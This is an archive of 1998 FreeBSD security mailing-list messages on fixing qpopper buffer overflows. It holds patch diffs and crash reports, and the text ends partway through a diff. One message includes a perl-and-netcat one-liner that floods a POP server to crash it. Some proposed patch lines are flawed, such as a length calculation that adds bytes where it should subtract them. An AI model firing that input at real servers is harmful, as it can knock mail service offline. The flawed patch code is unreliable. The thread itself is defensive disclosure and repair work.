From owner-freebsd-security Sun Jun 28 00:59:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA14380 for freebsd-security-outgoing; Sun, 28 Jun 1998 00:59:42 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from piggy.kharkiv.net (piggy.kharkiv.net [194.44.156.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA14370 for ; Sun, 28 Jun 1998 00:59:28 -0700 (PDT) (envelope-from news@piggy.kharkiv.net) Received: (from news@localhost) by piggy.kharkiv.net (8.8.8-MVC/8.8.8/piggy) id KAA04453; Sun, 28 Jun 1998 10:58:59 +0300 (EEST) (envelope-from news) To: freebsd-security@FreeBSD.ORG Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT Date: Sun, 28 Jun 1998 10:59:00 +0300 Message-ID: <3595F7C4.650979D9@kharkiv.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.6-STABLE i386) X-Via: News-To-Mail v1.0 From: "Vadim V. Chepkov" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan K. Hubbard wrote: > > > THere seems to be yet another similar buffer overflow > > in pop_log.c > > Fixed. Please cvsup the latest ports collection and make sure > that ports/mail/popper is updated - all the new patches are in > ports/mail/popper/patches/patch-ag. > Hello! I did make that Updating collection ports-all/cvs Edit ports/mail/popper/patches/patch-ag Add delta 1.4 98.06.27.20.47.27 ache Add delta 1.5 98.06.27.21.47.34 jkh And now popper crush immediately # telnet localhost 110 Trying 127.0.0.1... Connected to localhost Escape character is '^]'. Connection closed by foreign host. /kernel: pid 9696 (popper), uid 0: exited on signal 11 (core dumped) Kind regards, Vadim V. Chepkov Kharkiv Online ISP ------------------------------------------------------ Vadim V. Chepkov, Kharkiv State Polytechnic University 21 Frunze Str., Kharkiv, Ukraine, 310002 Tel: +380 572 400279 Fax: +380 572 400592 e-mail: vvc@kharkiv.net http://www.kharkiv.net/~vvc ------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 01:42:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA17447 for freebsd-security-outgoing; Sun, 28 Jun 1998 01:42:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17442 for ; Sun, 28 Jun 1998 01:42:36 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id BAA04075; Sun, 28 Jun 1998 01:41:58 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Igor Roshchin cc: freebsd-security@FreeBSD.ORG, igor@alecto.physics.uiuc.edu (Igor Roshchin) Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT In-reply-to: Your message of "Sat, 27 Jun 1998 19:23:54 CDT." <199806280023.TAA04462@alecto.physics.uiuc.edu> Date: Sun, 28 Jun 1998 01:41:57 -0700 Message-ID: <4071.899023317@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I've just downloaded "popper" directory from > ftp://ftp.freebsd.org/.25/FreeBSD/FreeBSD-current/ports/mail > It is still missing patch for the "UIDL" problem > (pop_dropcopy.c) > > Several people had suggestion looking like: > if (strlen(cp) >= 128) cp[127] = 0; I don't see the sense of this. If you look at the code, the length of this string is always known and the test suggested above would accomplish *nothing*. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 01:47:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA18008 for freebsd-security-outgoing; Sun, 28 Jun 1998 01:47:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA17999 for ; Sun, 28 Jun 1998 01:47:02 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id BAA06106; Sun, 28 Jun 1998 01:45:50 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: "Vadim V. Chepkov" cc: freebsd-security@FreeBSD.ORG Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT In-reply-to: Your message of "Sun, 28 Jun 1998 10:59:00 +0300." <3595F7C4.650979D9@kharkiv.net> Date: Sun, 28 Jun 1998 01:45:49 -0700 Message-ID: <6102.899023549@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I did make that > > Updating collection ports-all/cvs > Edit ports/mail/popper/patches/patch-ag > Add delta 1.4 98.06.27.20.47.27 ache > Add delta 1.5 98.06.27.21.47.34 jkh > > > And now popper crush immediately Get revision 1.6 of that patch file; this is now fixed, sorry folks! - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 02:41:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA24683 for freebsd-security-outgoing; Sun, 28 Jun 1998 02:41:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA24678 for ; Sun, 28 Jun 1998 02:41:20 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id CAA06367; Sun, 28 Jun 1998 02:31:14 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: "Vadim V. Chepkov" cc: freebsd-security@FreeBSD.ORG Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT In-reply-to: Your message of "Sun, 28 Jun 1998 12:21:22 +0300." Date: Sun, 28 Jun 1998 02:31:13 -0700 Message-ID: <6363.899026273@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Sun, 28 Jun 1998, Jordan K. Hubbard wrote: > > > Get revision 1.6 of that patch file; this is now fixed, sorry folks! > > > > Hello! > > I did that, but it still crashes on overflow. Well, I'm going to let you find this one then. I don't even have the *exploit* for this problem and the folks who are managing to induce these overflows can run gdb on popper's post-mortem dumps a lot more easily than I can. :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 02:41:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA24698 for freebsd-security-outgoing; Sun, 28 Jun 1998 02:41:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from piggy.kharkiv.net (piggy.kharkiv.net [194.44.156.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA24589 for ; Sun, 28 Jun 1998 02:40:05 -0700 (PDT) (envelope-from vvc@kharkiv.net) Received: (from uucp@localhost) by piggy.kharkiv.net (8.8.8-MVC/8.8.8/piggy) with UUCP id MAA10859; Sun, 28 Jun 1998 12:24:24 +0300 (EEST) (envelope-from vvc@kharkiv.net) Received: from localhost (vvc@localhost) by hut.kharkiv.net (8.8.8/8.8.8/hut) with SMTP id MAA00532; Sun, 28 Jun 1998 12:21:22 +0300 (EEST) (envelope-from vvc@kharkiv.net) Date: Sun, 28 Jun 1998 12:21:22 +0300 (EEST) From: "Vadim V. Chepkov" To: "Jordan K. Hubbard" cc: freebsd-security@FreeBSD.ORG Subject: Re: (FWD) QPOPPER REMOTE ROOT EXPLOIT In-Reply-To: <6102.899023549@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Jun 1998, Jordan K. Hubbard wrote: > Get revision 1.6 of that patch file; this is now fixed, sorry folks! > Hello! I did that, but it still crashes on overflow. Kind regards, Vadim V. Chepkov Kharkiv Online ISP ------------------------------------------------------ Vadim V. Chepkov, Kharkiv State Polytechnic University 21 Frunze Str., Kharkiv, Ukraine, 310002 Tel: +380 572 400279 Fax: +380 572 400592 e-mail: vvc@kharkiv.net http://www.kharkiv.net/~vvc ------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 06:43:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA22977 for freebsd-security-outgoing; Sun, 28 Jun 1998 06:43:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mars.abcinternet.net (drow@mars.abcinternet.net [151.198.180.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA22550; Sun, 28 Jun 1998 06:39:58 -0700 (PDT) (envelope-from drow@false.org) Received: (from drow@localhost) by mars.abcinternet.net (8.8.8/8.8.8) id JAA03939; Sun, 28 Jun 1998 09:47:07 -0400 (EDT) X-Authentication-Warning: mars.abcinternet.net: drow set sender to drow@false.org using -f Message-ID: <19980628094706.A3612@abcinternet.net> Date: Sun, 28 Jun 1998 09:47:06 -0400 From: Dan Jacobowitz To: ache@FreeBSD.ORG, security@FreeBSD.ORG Subject: qpopper Mail-Followup-To: ache@freebsd.org, security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.92.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It seems that the latest patch-ag does not successfully address the problem. Why, I am not exactly sure - it looks like it should, from here. But it _does not_. [1] mars:/u/drow# perl -e 'print "E"x2000,"\r\nQUIT\r\n";'| nc -i 2 0 110 +OK QPOP (version 2.41beta1) at mars.abcinternet.net starting. <3556.899041328@mars.abcinternet.net> -ERR Unknown command: "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee [1] mars:/u/drow# dmesg |tail -1 shows: pid 3556 (popper), uid 0: exited on signal 11 gdb shows that it is jumping to 0x0 instead of 'eeee', but that is still a very bad thing for a popper to do. Daniel Jacobowitz drow@false.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 09:14:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA08419 for freebsd-security-outgoing; Sun, 28 Jun 1998 09:14:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from destiny.erols.com (root@destiny.erols.com [207.96.73.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA08133; Sun, 28 Jun 1998 09:12:33 -0700 (PDT) (envelope-from jdowdal@destiny.erols.com) Received: from destiny.erols.com (someone@destiny.erols.com [207.96.73.65]) by destiny.erols.com (8.8.8/8.6.12) with SMTP id MAA29634; Sun, 28 Jun 1998 12:11:34 -0400 (EDT) Date: Sun, 28 Jun 1998 12:11:33 -0400 (EDT) From: John Dowdal To: Dan Jacobowitz cc: ache@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: qpopper In-Reply-To: <19980628094706.A3612@abcinternet.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 28 Jun 1998, Dan Jacobowitz wrote: > It seems that the latest patch-ag does not successfully address the > problem. Why, I am not exactly sure - it looks like it should, from > here. But it _does not_. Actually the current patch (cvsupped at about 11pm EST on Saturday) *always* core dumps, even with netscape connecting attempting to download mail: Jun 28 11:37:12 destiny /kernel: pid 29389 (popper), uid 0: exited on signal 11 John To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 10:17:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA14459 for freebsd-security-outgoing; Sun, 28 Jun 1998 10:17:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA14449 for ; Sun, 28 Jun 1998 10:17:38 -0700 (PDT) (envelope-from spork@super-g.com) Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id NAA28545; Sun, 28 Jun 1998 13:17:34 -0400 (EDT) Date: Sun, 28 Jun 1998 13:17:34 -0400 (EDT) From: spork X-Sender: spork@super-g.inch.com To: "Aaron D. Gifford" cc: security@FreeBSD.ORG Subject: Re: popper popper and more popper (Included is a FIX to the not-working popper) In-Reply-To: <3595D4F7.DDCF4E0E@infowest.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I grabbed the MAXPARMLENGTH patch off of your post to Bugtraq yesterday, and had no problems with it. For whatever reason one patch didn't apply clean, but I think that's just a problem with your mailer wrapping lines. I've yet to see any ill effects from it... Thanks, Charles Charles Sprickman spork@super-g.com ---- On Sat, 27 Jun 1998, Aaron D. Gifford wrote: > Hello, > > I don't know this message really should go, but I have an additional bug fix > for qpopper (at the bottom of this message), a suggested cosmetic change (the > first part of this message), and an optional patch (middle of this message) > for qpopper. > > ===== FIRST ===== > The purely cosmetic change first... In the file pop_auth.c the line: > > return (pop_msg(p,POP_FAILURE,"This command is not supported yet")); > > functions perfectly, but my log files keep getting messages like: > > Jun 27 21:52:52 blah popper[22348]: @dialport05.xyzisp.org: -ERR This > command is not supported yet > > Before I groked the popper source code, I had NO CLUE what this meant. After > changing the above line of code thus: > > return (pop_msg(p,POP_FAILURE,"The auth command is not supported yet")); > > my log files are completely comprehensible without having to look at the > popper source code. > > > ===== SECOND ===== > Now for the second change, the optional patch. Take it with a grain of salt. > I personally like it and think it improves the security and handling of > untrusted data from the POP client. It MIGHT violate the POP3 RFC even though > it does not break any of the POP clients I've tested (Eudora, Netscape mail, > and MS Internet Mail). > > In looking at the recent buffer overflows, I noticed that popper.h had an > interesting define: > > #define MAXPARMLEN 10 > > Yet if you grep for MAXPARMLEN, it ONLY shows up in the header file. I highly > suspect that the qpopper author(s) intended to limit POP commands and > parameters to this length but never implemented it. Here's a quick patch that > implements this feature. Had it been implemented in the first place, the > recent buffer exploits would have been more difficult or perhaps even > impossible. It may be that such an implementation may violate an RFC (I > haven't read the POP3 definition). I don't know. > > Perhaps you might only include the patch as an additonal optional patch with a > brief note in the README for those who want to add this functionality. I have > been running the patch below on a moderate volume 6,000 user system without > any trouble. > > Here it is: > > diff -p popper.h popper.new.h > *** popper.h Sat Jun 27 22:46:59 1998 > --- popper.new.h Sat Jun 27 22:47:09 1998 > *************** > *** 59,65 **** > #define MAXMSGLINELEN MAXLINELEN > #define MAXCMDLEN 4 > #define MAXPARMCOUNT 5 > ! #define MAXPARMLEN 10 > #define ALLOC_MSGS 20 > > #ifndef OSF1 > --- 59,65 ---- > #define MAXMSGLINELEN MAXLINELEN > #define MAXCMDLEN 4 > #define MAXPARMCOUNT 5 > ! #define MAXPARMLEN 16 > #define ALLOC_MSGS 20 > > #ifndef OSF1 > diff -p pop_parse.c pop_parse.new.c > *** pop_parse.c Wed Nov 19 14:20:38 1997 > --- pop_parse.new.c Sat Jun 27 22:58:17 1998 > *************** char * buf; /* Pointer > *** 26,31 **** > --- 26,32 ---- > { > char * mp; > register int i; > + register int parmlen; > > /* Loop through the POP command array */ > for (mp = buf, i = 0; ; i++) { > *************** char * buf; /* Pointer > *** 45,52 **** > /* Point to the start of the token */ > p->pop_parm[i] = mp; > > /* Search for the first space character (end of the token) */ > ! while (!isspace(*mp) && *mp) mp++; > > /* Delimit the token with a null */ > if (*mp) *mp++ = 0; > --- 46,75 ---- > /* Point to the start of the token */ > p->pop_parm[i] = mp; > > + /* Start counting the length of this token */ > + parmlen = 0; > + > /* Search for the first space character (end of the token) */ > ! while (!isspace(*mp) && *mp) { > ! mp++; > ! parmlen++; > ! if (parmlen > MAXPARMLEN) { > ! /* Truncate parameter to the max. allowable size */ > ! *mp = '\0'; > ! > ! /* Fail with an appropriate message */ > ! if (i == 0) { > ! pop_msg(p,POP_FAILURE, > ! "Command \"%s\" (truncated) exceedes maximum > permitted size.", > ! p->pop_command); > ! } else { > ! pop_msg(p,POP_FAILURE, > ! "Argument %d \"%s\" (truncated) exceeds maximum > permitted size.", > ! i, p->pop_parm[i]); > ! } > ! return(-1); > ! } > ! } > > /* Delimit the token with a null */ > if (*mp) *mp++ = 0; > > > ===== LAST the BUG FIX (Two parts) ===== > Last of all, I have a few problems with patch-ag. First, in a patched > pop_msg.c, beginning at line 92: > > /* Append the */ > len -= strlen(message); > (void)strncat(message, len, "\r\n"); > > Before the above assignment: > len == sizeof(message) - strlen(stat == POP_SUCCESS ? POP_OK : POP_ERR) > > After the assignment: > len == sizeof(message) - strlen(stat == POP_SUCCESS ? POP_OK : POP_ERR) - > strlen(message) > > That means that if: > stat == POP_SUCCESS > strlen(POP_OK) == 5 > sizeof(message) == 1024 > assume that vsnprintf(mp,len,format,ap) appends a VERY LARGE > string with a strlen of 1018 to message > > Then the before and after would be: > BEFORE: len == 1019 (or 1024 - 5) > AFTER: len == -4 (or 1019 - 1023) > > The strlen(stat == POP_SUCCESS ? POP_OK : POP_ERR) essentially gets subtracted > twice by the code, once above the v/snprintf()'s and again afterward. > > I believe the code should instead read beginning at line 92: > > /* Append the */ > len -= strlen(mp); > (void)strncat(message, "\r\n", len); > > There is also the possibility that the strncat() will fail to append the > "\r\n" in extremem cases because there's not enough buffer length left. I > believe this should not be allowed to happen. > > **** BIG NOTE **** > The problems reported today about popper not working after Jordan's patches > occur because the new call to strncat() mistakenly transposes the "\r\n" and > len parameters. The correct parameter order is as I show in my above code. > This fixes this problem and lets popper work normally. > **** END NOTE **** > > The pop_msg.c code at line 62 as currently patched reads: > > /* Point past the POP status indicator in the message message */ > l = strlen(mp); > len -= l, mp += l; > > I would instead do: > > /* Point past the POP status indicator in the message message */ > l = strlen(mp); > mp += l; > /* > * Subtract an additional 2 from the remaining buffer length > * so that after the vsnprintf()/snprintf() calls there will > * still be enough buffer space to append a "\r\n" even in a > * worst-case scenario. > */ > len -= l - 2; > > Why? By pre-removing 2 chars from the buffer maximum limit, there should > always be room left for the "\r\n" appended later on. I believe this would be > the "right" thing to do. It guarantees that the POP client will always be > sent the expected "\r\n" sequence even in abnormal cases. > > On a mostly unrelated note, many many kudos and thanks to the entire FreeBSD > core team and to all contributors! I use FreeBSD as the core OS for InfoWest, > a local ISP I work for and it is ROCK SOLID! I also run it at home and now > RARELY ever boot to Windows. > > Sincerely, > Aaron Gifford > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 11:53:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA24614 for freebsd-security-outgoing; Sun, 28 Jun 1998 11:53:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from infowest.com (infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA24606 for ; Sun, 28 Jun 1998 11:53:11 -0700 (PDT) (envelope-from agifford@infowest.com) Received: from liberty.infowest.com (liberty.infowest.com [207.49.60.254]) by infowest.com (8.8.8/8.8.8) with SMTP id MAA22990 for ; Sun, 28 Jun 1998 12:52:41 -0600 (MDT) Message-Id: <199806281852.MAA22990@infowest.com> Date: Sun, 28 Jun 1998 02:04:53 -0600 From: "Aaron D. Gifford" To: Subject: Re: popper popper and more popper (Included is a FIX to the not-working popper) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org spork@super-g.com wrote: > > Hi, > > I grabbed the MAXPARMLENGTH patch off of your post to Bugtraq yesterday, > and had no problems with it. For whatever reason one patch didn't apply > clean, but I think that's just a problem with your mailer wrapping lines. > > I've yet to see any ill effects from it... > > Thanks, > > Charles > > Charles Sprickman > spork@super-g.com <> > > > > #define MAXPARMLEN 16 > > You may want to bump MAXPARMLEN up to 32 if you have any POP users who use APOP authentication so that the APOP MD5 parameter will be accepted. Aaron out. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sun Jun 28 12:25:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA28683 for freebsd-security-outgoing; Sun, 28 Jun 1998 12:25:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from infowest.com (infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA28674 for ; Sun, 28 Jun 1998 12:25:35 -0700 (PDT) (envelope-from agifford@infowest.com) Received: from liberty.infowest.com (liberty.infowest.com [207.49.60.254]) by infowest.com (8.8.8/8.8.8) with SMTP id NAA24567 for ; Sun, 28 Jun 1998 13:25:01 -0600 (MDT) Message-Id: <199806281925.NAA24567@infowest.com> To: Subject: UIDL overruns in qpopper From: "Aaron D. Gifford" Date: Sun, 28 Jun 1998 03:42:25 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When I first saw patches for pop_dropcopy.c that limit the uidl string length to 128, I couldn't see any overrun potential there. Then Miquel van Smoorenburg explained that the actual overrun occur in pop_uidl.c but can be prevented in pop_dropcopy.c. I looked at pop_uidl.c and sure enough, Miquel was correct. Further investigation revealed that another potential buffer overrun can occur in some cases where a huge From: header occurs and the EUIDL command is used by a POP client. The patch below constitute several changes I use on my FreeBSD boxen. It includes a fix for the signal 11 problem that some have reported after patch-ag is applied. It include a POP parameter limiting patch which you might want to avoid (it is the patch to the pop_parse.c file) -- I like it and it has been working on a 5,000-user system with no known problems yet -- but it might break something I don't know about or violate POP protocl. It includes a fix to the UIDL overrun by limiting the size of the UIDL data in pop_dropcopy.c. It also fixes another potentil UIDL overrun by reducing a buffer in pop_uidl.c. Finally, it also includes 2 cosmetic fixes that I like because my log files are more readable -- one change to pop_init.c and another to pop_auth.c. Whew! Please be aware that my mail software might wrap a line or two of the patch when I send this and cause it to break. Here goes: ========== diff -p work/qpopper2.41beta1/pop_auth.c work2/qpopper2.41beta1/pop_auth.c *** work/qpopper2.41beta1/pop_auth.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_auth.c Sat Jun 27 23:34:14 1998 *************** int pop_auth (p) *** 23,29 **** POP * p; { /* Tell the user that this command is not supported */ ! return (pop_msg(p,POP_FAILURE,"This command is not supported yet")); } --- 23,29 ---- POP * p; { /* Tell the user that this command is not supported */ ! return (pop_msg(p,POP_FAILURE,"The auth command is not supported yet")); } diff -p work/qpopper2.41beta1/pop_dropcopy.c work2/qpopper2.41beta1/pop_dropcopy.c *** work/qpopper2.41beta1/pop_dropcopy.c Sun Jun 28 12:58:14 1998 --- work2/qpopper2.41beta1/pop_dropcopy.c Sun Jun 28 13:07:47 1998 *************** POP *p; *** 489,495 **** /* Skip over header string */ cp = &buffer[7]; while (*cp && (*cp == ' ' || *cp == '\t')) cp++; ! if(strlen(cp) < DIG_SIZE) /* To account for the empty UIDL string */ { uidl_found--; /*roll over as though it hasn't seen anything*/ continue; --- 489,501 ---- /* Skip over header string */ cp = &buffer[7]; while (*cp && (*cp == ' ' || *cp == '\t')) cp++; ! /* ! * The UIDL digest SHOULD be approx. 32 chars long, ! * so reject/skip any X-UIDL: lines that don't fit ! * this profile. A new X-UIDL: line will be created ! * for any messages that don't have a valid one. ! */ ! if(strlen(cp) < DIG_SIZE || strlen(cp) > DIG_SIZE * 3) { uidl_found--; /*roll over as though it hasn't seen anything*/ continue; diff -p work/qpopper2.41beta1/pop_init.c work2/qpopper2.41beta1/pop_init.c *** work/qpopper2.41beta1/pop_init.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_init.c Sat Jun 27 23:38:54 1998 *************** char ** argmessage; *** 281,288 **** ch = gethostbyaddr((char *) &cs.sin_addr, sizeof(cs.sin_addr), AF_INET); if (ch == NULL){ pop_log(p,POP_PRIORITY, ! "(v%s) Unable to get canonical name of client, err = %d", ! VERSION, errno); p->client = p->ipaddr; } /* Save the cannonical name of the client host in --- 281,288 ---- ch = gethostbyaddr((char *) &cs.sin_addr, sizeof(cs.sin_addr), AF_INET); if (ch == NULL){ pop_log(p,POP_PRIORITY, ! "(v%s) Unable to get canonical name of client [%], err = %d", ! VERSION, p->ipaddr, errno); p->client = p->ipaddr; } /* Save the cannonical name of the client host in diff -p work/qpopper2.41beta1/pop_msg.c work2/qpopper2.41beta1/pop_msg.c *** work/qpopper2.41beta1/pop_msg.c Sun Jun 28 12:58:15 1998 --- work2/qpopper2.41beta1/pop_msg.c Sat Jun 27 23:25:59 1998 *************** va_dcl *** 61,67 **** /* Point past the POP status indicator in the message message */ l = strlen(mp); ! len -= l, mp += l; /* Append the message (formatted, if necessary) */ if (format) --- 61,74 ---- /* Point past the POP status indicator in the message message */ l = strlen(mp); ! mp += l; ! /* ! * Subtract an additional 2 from the remaining buffer length ! * so that after the vsnprintf()/snprintf() calls there will ! * still be enough buffer space to append a "\r\n" even in a ! * worst-case scenario. ! */ ! len -= l - 2; /* Append the message (formatted, if necessary) */ if (format) *************** va_dcl *** 90,97 **** (p->user ? p->user : "(null)"), p->client, message); /* Append the */ ! len -= strlen(message); ! (void)strncat(message, len, "\r\n"); /* Send the message to the client */ (void)fputs(message,p->output); --- 97,104 ---- (p->user ? p->user : "(null)"), p->client, message); /* Append the */ ! len -= strlen(mp); ! (void)strncat(message, "\r\n", len); /* Send the message to the client */ (void)fputs(message,p->output); diff -p work/qpopper2.41beta1/pop_parse.c work2/qpopper2.41beta1/pop_parse.c *** work/qpopper2.41beta1/pop_parse.c Wed Nov 19 14:20:38 1997 --- work2/qpopper2.41beta1/pop_parse.c Sat Jun 27 22:58:17 1998 *************** char * buf; /* Pointer *** 26,31 **** --- 26,32 ---- { char * mp; register int i; + register int parmlen; /* Loop through the POP command array */ for (mp = buf, i = 0; ; i++) { *************** char * buf; /* Pointer *** 45,52 **** /* Point to the start of the token */ p->pop_parm[i] = mp; /* Search for the first space character (end of the token) */ ! while (!isspace(*mp) && *mp) mp++; /* Delimit the token with a null */ if (*mp) *mp++ = 0; --- 46,75 ---- /* Point to the start of the token */ p->pop_parm[i] = mp; + /* Start counting the length of this token */ + parmlen = 0; + /* Search for the first space character (end of the token) */ ! while (!isspace(*mp) && *mp) { ! mp++; ! parmlen++; ! if (parmlen > MAXPARMLEN) { ! /* Truncate parameter to the max. allowable size */ ! *mp = '\0'; ! ! /* Fail with an appropriate message */ ! if (i == 0) { ! pop_msg(p,POP_FAILURE, ! "Command \"%s\" (truncated) exceedes maximum permitted size.", ! p->pop_command); ! } else { ! pop_msg(p,POP_FAILURE, ! 